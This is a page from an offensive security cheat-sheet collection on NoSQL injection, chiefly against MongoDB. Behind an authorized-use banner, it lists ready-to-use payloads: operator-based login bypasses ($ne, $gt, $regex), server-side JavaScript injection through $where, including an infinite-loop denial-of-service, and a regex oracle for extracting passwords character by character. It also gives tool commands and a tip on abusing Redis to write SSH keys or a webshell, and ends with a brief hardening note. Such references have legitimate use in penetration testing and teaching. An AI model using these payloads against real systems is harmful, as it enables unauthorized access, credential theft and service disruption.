← All cheat sheets

NOSQL-INJECTION

Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.

Injection against NoSQL stores (MongoDB most common). Instead of SQL syntax you
abuse query operators and type juggling. Authorized testing only.

AUTH BYPASS (MONGODB)#

JSON body (login):
  {"user":"admin","pass":{"$ne":null}}
  {"user":"admin","pass":{"$ne":"x"}}
  {"user":{"$gt":""},"pass":{"$gt":""}}
  {"user":"admin","pass":{"$regex":"^a"}}        # confirm charset -> extract
URL-encoded form (operator in the key):
  user=admin&pass[$ne]=x
  user[$ne]=&pass[$ne]=
Known operators: $ne $gt $gte $lt $lte $in $nin $regex $exists $where $or $and

OPERATOR / SYNTAX INJECTION#

If input is placed in the query object, inject operators to change logic.
  {"age":{"$gt":0}}                              # always true
  {"$where":"this.pass.length > 0"}              # JS evaluated server-side
  {"$where":"sleep(5000)"}                       # time-based oracle

JAVASCRIPT INJECTION ($where / mapReduce)#

Blind boolean/time via server-side JS:
  ';return true;var x='
  ';return (this.password[0]=='a');var x='
  ';while(true){};var x='                        # DoS / timing
Modern drivers often disable $where; test anyway.

BLIND DATA EXFIL (REGEX ORACLE)#

Extract a field char-by-char using $regex true/false responses:
  pass[$regex]=^a      pass[$regex]=^b ...        # first char
  pass[$regex]=^admin1 ...                        # extend prefix
Automate with Burp Intruder or a script walking the charset.

TOOLING#

NoSQLMap            # automated detection/exploitation (Mongo, Couch)
nosqli (Go)         # nosqli scan -t http://host/login -u user -p pass
Burp + manual operator payload lists (seclists NoSQL)
mongo shell / Compass to confirm impact on an authorized test DB

OTHER STORES#

CouchDB: _all_docs, _users abuse, Erlang/HTTP API auth gaps.
Redis: unauth access -> CONFIG SET to write SSH keys/webshell, module load.
GraphQL over Mongo: inject operators inside variables.

HARDENING (blue-team note)#

Cast/validate types (reject objects where strings expected), use parameterized
driver queries, disable server-side JS ($where, mapReduce), least-privilege DB
users, and schema validation.